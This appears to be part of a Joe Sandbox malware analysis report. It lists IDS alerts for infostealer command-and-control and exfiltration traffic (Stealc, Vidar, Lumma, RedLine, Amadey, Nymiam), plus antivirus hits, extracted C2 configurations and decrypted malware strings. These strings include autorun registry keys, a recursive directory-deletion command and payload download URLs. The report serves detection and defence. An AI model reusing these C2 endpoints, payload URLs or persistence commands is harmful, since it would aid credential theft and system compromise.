2025-02-01T17:18:16.358445+0100	2044696	1	A Network Trojan was detected	192.168.2.8	49721	185.215.113.16	80	TCP
2025-02-01T17:18:24.565431+0100	2044696	1	A Network Trojan was detected	192.168.2.8	49740	185.215.113.16	80	TCP
2025-02-01T17:18:38.180930+0100	2044696	1	A Network Trojan was detected	192.168.2.8	49770	185.215.113.43	80	TCP
2025-02-01T17:18:42.217257+0100	2044696	1	A Network Trojan was detected	192.168.2.8	49780	185.215.113.43	80	TCP
2025-02-01T17:18:47.170247+0100	2044696	1	A Network Trojan was detected	192.168.2.8	49791	185.215.113.43	80	TCP
2025-02-01T17:18:52.333530+0100	2044696	1	A Network Trojan was detected	192.168.2.8	49799	185.215.113.43	80	TCP
2025-02-01T17:18:58.500304+0100	2044696	1	A Network Trojan was detected	192.168.2.8	49815	185.215.113.43	80	TCP
2025-02-01T17:19:04.303942+0100	2044696	1	A Network Trojan was detected	192.168.2.8	49826	185.215.113.43	80	TCP
2025-02-01T17:19:08.211633+0100	2044696	1	A Network Trojan was detected	192.168.2.8	49834	185.215.113.43	80	TCP
2025-02-01T17:19:16.045196+0100	2044696	1	A Network Trojan was detected	192.168.2.8	49849	185.215.113.43	80	TCP

ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T17:19:09.514620+0100	2045001	1	Malware Command and Control Activity Detected	103.84.89.222	33791	192.168.2.8	49818	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rampnatleadk .click)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T17:18:34.536990+0100	2059149	1	Domain Observed Used for C2 Detected	192.168.2.8	54086	1.1.1.1	53	UDP

ET MALWARE Win32/Stealc Active C2 Responding with browsers Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T17:18:10.835521+0100	2044245	1	Malware Command and Control Activity Detected	185.215.113.115	80	192.168.2.8	49711	TCP

ET MALWARE Win32/Stealc Requesting browsers Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T17:18:10.734614+0100	2044244	1	Malware Command and Control Activity Detected	192.168.2.8	49711	185.215.113.115	80	TCP

ET MALWARE Win32/Stealc Requesting plugins Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T17:18:11.058070+0100	2044246	1	Malware Command and Control Activity Detected	192.168.2.8	49711	185.215.113.115	80	TCP

ET MALWARE Win32/Stealc Submitting System Information to C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T17:18:12.138449+0100	2044248	1	Malware Command and Control Activity Detected	192.168.2.8	49711	185.215.113.115	80	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T17:18:11.159416+0100	2044247	1	Malware Command and Control Activity Detected	185.215.113.115	80	192.168.2.8	49711	TCP
2025-02-01T17:19:11.671883+0100	2044247	1	Malware Command and Control Activity Detected	116.202.5.153	443	192.168.2.8	49840	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T17:19:14.553314+0100	2051831	1	Malware Command and Control Activity Detected	116.202.5.153	443	192.168.2.8	49844	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T17:19:14.551545+0100	2049087	1	A Network Trojan was detected	192.168.2.8	49844	116.202.5.153	443	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T17:19:18.672726+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.8	49854	116.202.5.153	443	TCP
2025-02-01T17:19:19.640525+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.8	49857	116.202.5.153	443	TCP
2025-02-01T17:19:29.110172+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.8	49879	116.202.5.153	443	TCP
2025-02-01T17:19:29.853467+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.8	49882	116.202.5.153	443	TCP
2025-02-01T17:19:31.082952+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.8	49894	116.202.5.153	443	TCP
2025-02-01T17:19:33.259219+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.8	49904	116.202.5.153	443	TCP
2025-02-01T17:19:35.156575+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.8	49907	116.202.5.153	443	TCP
2025-02-01T17:19:44.859409+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.8	49921	116.202.5.153	443	TCP
2025-02-01T17:19:44.994067+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.8	49927	116.202.5.153	443	TCP
2025-02-01T17:19:46.203173+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.8	49929	116.202.5.153	443	TCP
2025-02-01T17:19:48.453599+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.8	49949	116.202.5.153	443	TCP
2025-02-01T17:19:49.933579+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.8	49961	116.202.5.153	443	TCP
2025-02-01T17:19:52.127982+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.8	49974	116.202.5.153	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T17:18:41.209329+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.8	49777	104.21.79.9	443	TCP
2025-02-01T17:18:42.718010+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.8	49782	104.21.18.116	443	TCP
2025-02-01T17:19:20.435516+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.8	49859	104.21.18.116	443	TCP

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T17:18:10.415495+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.8	49711	185.215.113.115	80	TCP
2025-02-01T17:18:54.897856+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.8	49805	185.215.113.115	80	TCP

ETPRO MALWARE Amadey CnC Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T17:18:32.622673+0100	2856121	1	A Network Trojan was detected	192.168.2.8	49757	185.215.113.43	80	TCP

ETPRO MALWARE Amadey CnC Activity M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T17:18:04.323401+0100	2856147	1	A Network Trojan was detected	192.168.2.8	49709	185.215.113.16	80	TCP

ETPRO MALWARE Amadey CnC Response M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T17:18:04.579908+0100	2856122	1	A Network Trojan was detected	185.215.113.16	80	192.168.2.8	49709	TCP
2025-02-01T17:18:31.883765+0100	2856122	1	A Network Trojan was detected	185.215.113.43	80	192.168.2.8	49745	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T17:18:04.806129+0100	2803305	3	Unknown Traffic	192.168.2.8	49709	185.215.113.16	80	TCP
2025-02-01T17:18:08.129405+0100	2803305	3	Unknown Traffic	192.168.2.8	49710	185.215.113.16	80	TCP
2025-02-01T17:18:12.923382+0100	2803305	3	Unknown Traffic	192.168.2.8	49713	185.215.113.97	80	TCP
2025-02-01T17:18:17.257496+0100	2803305	3	Unknown Traffic	192.168.2.8	49722	185.215.113.97	80	TCP
2025-02-01T17:18:27.986430+0100	2803305	3	Unknown Traffic	192.168.2.8	49748	185.215.113.97	80	TCP
2025-02-01T17:18:33.391800+0100	2803305	3	Unknown Traffic	192.168.2.8	49758	185.215.113.16	80	TCP
2025-02-01T17:18:42.955101+0100	2803305	3	Unknown Traffic	192.168.2.8	49784	185.215.113.16	80	TCP
2025-02-01T17:18:47.897451+0100	2803305	3	Unknown Traffic	192.168.2.8	49793	185.215.113.16	80	TCP
2025-02-01T17:18:53.082567+0100	2803305	3	Unknown Traffic	192.168.2.8	49802	185.215.113.97	80	TCP
2025-02-01T17:18:59.316155+0100	2803305	3	Unknown Traffic	192.168.2.8	49817	185.215.113.97	80	TCP
2025-02-01T17:19:08.964719+0100	2803305	3	Unknown Traffic	192.168.2.8	49838	185.215.113.97	80	TCP
2025-02-01T17:19:17.296370+0100	2803305	3	Unknown Traffic	192.168.2.8	49851	185.215.113.97	80	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T17:18:12.627602+0100	2803304	3	Unknown Traffic	192.168.2.8	49711	185.215.113.115	80	TCP
2025-02-01T17:18:38.375449+0100	2803304	3	Unknown Traffic	192.168.2.8	49766	185.215.113.115	80	TCP
2025-02-01T17:18:39.487671+0100	2803304	3	Unknown Traffic	192.168.2.8	49766	185.215.113.115	80	TCP
2025-02-01T17:18:40.472141+0100	2803304	3	Unknown Traffic	192.168.2.8	49766	185.215.113.115	80	TCP
2025-02-01T17:18:41.067975+0100	2803304	3	Unknown Traffic	192.168.2.8	49766	185.215.113.115	80	TCP
2025-02-01T17:18:43.243742+0100	2803304	3	Unknown Traffic	192.168.2.8	49766	185.215.113.115	80	TCP
2025-02-01T17:18:44.018828+0100	2803304	3	Unknown Traffic	192.168.2.8	49766	185.215.113.115	80	TCP

ETPRO MALWARE RedLine - CheckConnect Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T17:18:59.664534+0100	2849662	1	Malware Command and Control Activity Detected	192.168.2.8	49818	103.84.89.222	33791	TCP

ETPRO MALWARE RedLine - EnvironmentSettings Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T17:19:05.164534+0100	2849351	1	Malware Command and Control Activity Detected	192.168.2.8	49818	103.84.89.222	33791	TCP

ETPRO MALWARE RedLine - SetEnvironment Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T17:19:09.865300+0100	2849352	1	Malware Command and Control Activity Detected	192.168.2.8	49818	103.84.89.222	33791	TCP

ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T17:19:34.083799+0100	2843864	1	A Network Trojan was detected	192.168.2.8	49906	104.21.18.116	443	TCP

ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T17:19:29.853467+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.8	49882	116.202.5.153	443	TCP
2025-02-01T17:19:31.082952+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.8	49894	116.202.5.153	443	TCP
2025-02-01T17:19:33.259219+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.8	49904	116.202.5.153	443	TCP
2025-02-01T17:19:44.994067+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.8	49927	116.202.5.153	443	TCP
2025-02-01T17:19:46.203173+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.8	49929	116.202.5.153	443	TCP
2025-02-01T17:19:48.453599+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.8	49949	116.202.5.153	443	TCP
2025-02-01T17:19:49.933579+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.8	49961	116.202.5.153	443	TCP
2025-02-01T17:19:52.127982+0100	2859636	1	Malware Command and Control Activity Detected	192.168.2.8	49974	116.202.5.153	443	TCP

ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T17:19:07.828630+0100	2859378	1	Malware Command and Control Activity Detected	192.168.2.8	49832	116.202.5.153	443	TCP

Joe Security MALWARE Nymiam - C&C DLL Download Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T17:18:28.419606+0100	1800003	1	Malware Command and Control Activity Detected	192.168.2.8	49746	185.156.73.23	80	TCP
2025-02-01T17:19:20.871792+0100	1800003	1	Malware Command and Control Activity Detected	192.168.2.8	49860	185.156.73.23	80	TCP

Joe Security MALWARE Nymiam - C&C DLL Key Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T17:18:28.020734+0100	1800002	1	Malware Command and Control Activity Detected	192.168.2.8	49746	185.156.73.23	80	TCP
2025-02-01T17:19:20.506626+0100	1800002	1	Malware Command and Control Activity Detected	192.168.2.8	49860	185.156.73.23	80	TCP

Joe Security MALWARE Nymiam - C&C Files Download Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T17:18:29.065336+0100	1800004	1	Malware Command and Control Activity Detected	192.168.2.8	49746	185.156.73.23	80	TCP
2025-02-01T17:18:31.755932+0100	1800004	1	Malware Command and Control Activity Detected	192.168.2.8	49746	185.156.73.23	80	TCP
2025-02-01T17:18:34.486059+0100	1800004	1	Malware Command and Control Activity Detected	192.168.2.8	49746	185.156.73.23	80	TCP
2025-02-01T17:18:36.842410+0100	1800004	1	Malware Command and Control Activity Detected	192.168.2.8	49746	185.156.73.23	80	TCP
2025-02-01T17:18:39.796480+0100	1800004	1	Malware Command and Control Activity Detected	192.168.2.8	49746	185.156.73.23	80	TCP
2025-02-01T17:18:42.584455+0100	1800004	1	Malware Command and Control Activity Detected	192.168.2.8	49746	185.156.73.23	80	TCP
2025-02-01T17:18:45.358261+0100	1800004	1	Malware Command and Control Activity Detected	192.168.2.8	49746	185.156.73.23	80	TCP
2025-02-01T17:18:47.904617+0100	1800004	1	Malware Command and Control Activity Detected	192.168.2.8	49746	185.156.73.23	80	TCP
2025-02-01T17:18:50.388842+0100	1800004	1	Malware Command and Control Activity Detected	192.168.2.8	49746	185.156.73.23	80	TCP
2025-02-01T17:18:53.015656+0100	1800004	1	Malware Command and Control Activity Detected	192.168.2.8	49746	185.156.73.23	80	TCP
2025-02-01T17:18:55.606773+0100	1800004	1	Malware Command and Control Activity Detected	192.168.2.8	49746	185.156.73.23	80	TCP
2025-02-01T17:19:21.380165+0100	1800004	1	Malware Command and Control Activity Detected	192.168.2.8	49860	185.156.73.23	80	TCP
2025-02-01T17:19:23.840432+0100	1800004	1	Malware Command and Control Activity Detected	192.168.2.8	49860	185.156.73.23	80	TCP
2025-02-01T17:19:26.331661+0100	1800004	1	Malware Command and Control Activity Detected	192.168.2.8	49860	185.156.73.23	80	TCP
2025-02-01T17:19:28.983482+0100	1800004	1	Malware Command and Control Activity Detected	192.168.2.8	49860	185.156.73.23	80	TCP
2025-02-01T17:19:31.643227+0100	1800004	1	Malware Command and Control Activity Detected	192.168.2.8	49860	185.156.73.23	80	TCP
2025-02-01T17:19:34.223387+0100	1800004	1	Malware Command and Control Activity Detected	192.168.2.8	49860	185.156.73.23	80	TCP
2025-02-01T17:19:36.782626+0100	1800004	1	Malware Command and Control Activity Detected	192.168.2.8	49860	185.156.73.23	80	TCP
2025-02-01T17:19:39.278761+0100	1800004	1	Malware Command and Control Activity Detected	192.168.2.8	49860	185.156.73.23	80	TCP
2025-02-01T17:19:42.056080+0100	1800004	1	Malware Command and Control Activity Detected	192.168.2.8	49860	185.156.73.23	80	TCP
2025-02-01T17:19:44.927973+0100	1800004	1	Malware Command and Control Activity Detected	192.168.2.8	49860	185.156.73.23	80	TCP
2025-02-01T17:19:47.509457+0100	1800004	1	Malware Command and Control Activity Detected	192.168.2.8	49860	185.156.73.23	80	TCP

Joe Security MALWARE Nymiam - C&C Software Download Request

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T17:18:59.653348+0100	1800005	1	Malware Command and Control Activity Detected	192.168.2.8	49746	185.156.73.23	80	TCP
2025-02-01T17:19:00.963691+0100	1800005	1	Malware Command and Control Activity Detected	192.168.2.8	49746	185.156.73.23	80	TCP
2025-02-01T17:19:51.385202+0100	1800005	1	Malware Command and Control Activity Detected	192.168.2.8	49860	185.156.73.23	80	TCP
2025-02-01T17:19:52.330390+0100	1800005	1	Malware Command and Control Activity Detected	192.168.2.8	49860	185.156.73.23	80	TCP

Joe Security MALWARE RedLine - Initial C&C Contact - SOAP CheckConnect

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T17:18:59.664534+0100	1800000	1	Malware Command and Control Activity Detected	192.168.2.8	49818	103.84.89.222	33791	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 0xqfQZufeQ.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://185.215.113.115/c4becf79229cb002.phpion:	Avira URL Cloud: Label: malware
Source: .1.1home.fivegg5th.top	Avira URL Cloud: Label: malware
Source: https://rampnatleadk.click/api	Avira URL Cloud: Label: malware
Source: http://185.215.113.115/68b591d6548ec281/vcruntime140.dll	Avira URL Cloud: Label: malware
Source: http://home.fivegg5th.top/ZhnSMEmOyBahvsfTCosA1738232489http://home.fivegg5th.top/ZhnSMEmOyBahvsfTCo	Avira URL Cloud: Label: malware
Source: http://185.215.113.115/ws	Avira URL Cloud: Label: malware
Source: http://185.215.113.115/c4becf79229cb002.php3	Avira URL Cloud: Label: malware
Source: http://185.215.113.115/c4becf79229cb002.php)	Avira URL Cloud: Label: malware
Source: http://185.215.113.115/68b591d6548ec281/freebl3.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.115/68b591d6548ec281/nss3.dllll(	Avira URL Cloud: Label: malware
Source: http://185.215.113.97/files/notfinancing/random.exe	Avira URL Cloud: Label: malware
Source: https://rampnatleadk.click/api&Z	Avira URL Cloud: Label: malware
Source: https://rampnatleadk.click/e	Avira URL Cloud: Label: malware
Source: http://185.215.113.115/c4becf79229cb002.php1	Avira URL Cloud: Label: malware
Source: https://rampnatleadk.click/u	Avira URL Cloud: Label: malware
Source: https://rampnatleadk.click/i	Avira URL Cloud: Label: malware
Source: http://home.fivegg5th.top/ZhnSMEmOyBahvsfTCosA1738232489lse	Avira URL Cloud: Label: malware
Source: http://home.fivegg5th.top/ZhnSMEmOyBahvsfTCosA1738232489?argument=0p	Avira URL Cloud: Label: malware
Source: http://185.215.113.115/68b591d6548ec281/mozglue.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.97/files/SQL_gulong/random.exe	Avira URL Cloud: Label: malware
Source: http://185.215.113.115/c4becf79229cb002.phpd	Avira URL Cloud: Label: malware
Source: http://185.215.113.115/c4becf79229cb002.phpa	Avira URL Cloud: Label: malware
Source: http://185.215.113.115/c4becf79229cb002.phpe	Avira URL Cloud: Label: malware
Source: http://185.215.113.115/c4becf79229cb002.phpp	Avira URL Cloud: Label: malware
Source: https://rampnatleadk.click/	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpR	Avira URL Cloud: Label: malware
Source: http://185.215.113.115/c4becf79229cb002.phpy	Avira URL Cloud: Label: malware
Source: http://185.215.113.115/68b591d6548ec281/msvcp140.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.115/c4becf79229cb002.php=	Avira URL Cloud: Label: malware
Source: http://185.215.113.115/68b591d6548ec281/sqlite3.dllb	Avira URL Cloud: Label: malware
Source: http://185.215.113.115/c4becf79229cb002.phpG	Avira URL Cloud: Label: malware
Source: http://185.215.113.115/c4becf79229cb002.phpF	Avira URL Cloud: Label: malware
Source: http://185.215.113.115/c4becf79229cb002.phpK	Avira URL Cloud: Label: malware
Source: http://185.215.113.115/c4becf79229cb002.phpI	Avira URL Cloud: Label: malware
Source: http://185.215.113.115/c4becf79229cb002.phpH	Avira URL Cloud: Label: malware
Source: http://185.215.113.115/c4becf79229cb002.phpN	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[2].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[3].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[2].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[4].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[1].exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen

Found malware configuration

Source: 00000002.00000002.1491436515.0000000000D31000.00000040.00000001.01000000.00000007.sdmp	Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.16/Jo89Ku7d/index.php", "Version": "4.41", "Install Folder": "44111dbc49", "Install File": "axplong.exe"}
Source: 00000008.00000002.2448228643.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp	Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.115/c4becf79229cb002.php"}
Source: eb74aeb58b.exe.2340.23.memstrmin	Malware Configuration Extractor: LummaC {"C2 url": "https://rampnatleadk.click/api", "Build Version": "fBkCmu--labinstall"}
Source: 382cd038a3.exe.5600.16.memstrmin	Malware Configuration Extractor: Cryptbot {"C2 list": ["home.fivegg5th.top", ".fivgg5th.top", "bhome.fivegg5th.top", ".1.1home.fivegg5th.top"]}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[2].exe	ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[4].exe	ReversingLabs: Detection: 40%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\soft[1]	ReversingLabs: Detection: 70%
Source: C:\Users\user\AppData\Local\Temp\1062154001\ddea05ffa5.exe	ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Temp\1062157001\6e8173898b.exe	ReversingLabs: Detection: 40%
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Temp\5DWsYef8WwGeGz5\Y-Cleaner.exe	ReversingLabs: Detection: 70%

Multi AV Scanner detection for submitted file

Source: 0xqfQZufeQ.exe	Virustotal: Detection: 51%			Perma Link
Source: 0xqfQZufeQ.exe	ReversingLabs: Detection: 55%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[2].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[3].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[2].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\soft[1]	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[4].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[1].exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: 0xqfQZufeQ.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000002.00000002.1491436515.0000000000D31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: 185.215.113.16
Source: 00000002.00000002.1491436515.0000000000D31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: /Jo89Ku7d/index.php
Source: 00000002.00000002.1491436515.0000000000D31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: S-%lu-
Source: 00000002.00000002.1491436515.0000000000D31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: 44111dbc49
Source: 00000002.00000002.1491436515.0000000000D31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: axplong.exe
Source: 00000002.00000002.1491436515.0000000000D31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 00000002.00000002.1491436515.0000000000D31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 00000002.00000002.1491436515.0000000000D31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Startup
Source: 00000002.00000002.1491436515.0000000000D31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: cmd /C RMDIR /s/q
Source: 00000002.00000002.1491436515.0000000000D31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 00000002.00000002.1491436515.0000000000D31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: rundll32
Source: 00000002.00000002.1491436515.0000000000D31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Programs
Source: 00000002.00000002.1491436515.0000000000D31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 00000002.00000002.1491436515.0000000000D31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: %USERPROFILE%
Source: 00000002.00000002.1491436515.0000000000D31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: cred.dll\|clip.dll\|
Source: 00000002.00000002.1491436515.0000000000D31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: cred.dll
Source: 00000002.00000002.1491436515.0000000000D31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: clip.dll
Source: 00000002.00000002.1491436515.0000000000D31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: http://
Source: 00000002.00000002.1491436515.0000000000D31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: https://
Source: 00000002.00000002.1491436515.0000000000D31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: /quiet
Source: 00000002.00000002.1491436515.0000000000D31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: /Plugins/
Source: 00000002.00000002.1491436515.0000000000D31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: &unit=
Source: 00000002.00000002.1491436515.0000000000D31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: shell32.dll
Source: 00000002.00000002.1491436515.0000000000D31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: kernel32.dll
Source: 00000002.00000002.1491436515.0000000000D31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: GetNativeSystemInfo
Source: 00000002.00000002.1491436515.0000000000D31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: ProgramData\
Source: 00000002.00000002.1491436515.0000000000D31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: AVAST Software
Source: 00000002.00000002.1491436515.0000000000D31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Kaspersky Lab
Source: 00000002.00000002.1491436515.0000000000D31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Panda Security
Source: 00000002.00000002.1491436515.0000000000D31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Doctor Web
Source: 00000002.00000002.1491436515.0000000000D31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: 360TotalSecurity
Source: 00000002.00000002.1491436515.0000000000D31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Bitdefender
Source: 00000002.00000002.1491436515.0000000000D31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Norton
Source: 00000002.00000002.1491436515.0000000000D31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Sophos
Source: 00000002.00000002.1491436515.0000000000D31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Comodo
Source: 00000002.00000002.1491436515.0000000000D31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: WinDefender
Source: 00000002.00000002.1491436515.0000000000D31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: 0123456789
Source: 00000002.00000002.1491436515.0000000000D31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 00000002.00000002.1491436515.0000000000D31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: ------
Source: 00000002.00000002.1491436515.0000000000D31000.00000040.00000001.01000000.00000007.sdmp	String decryptor: ?scr=1
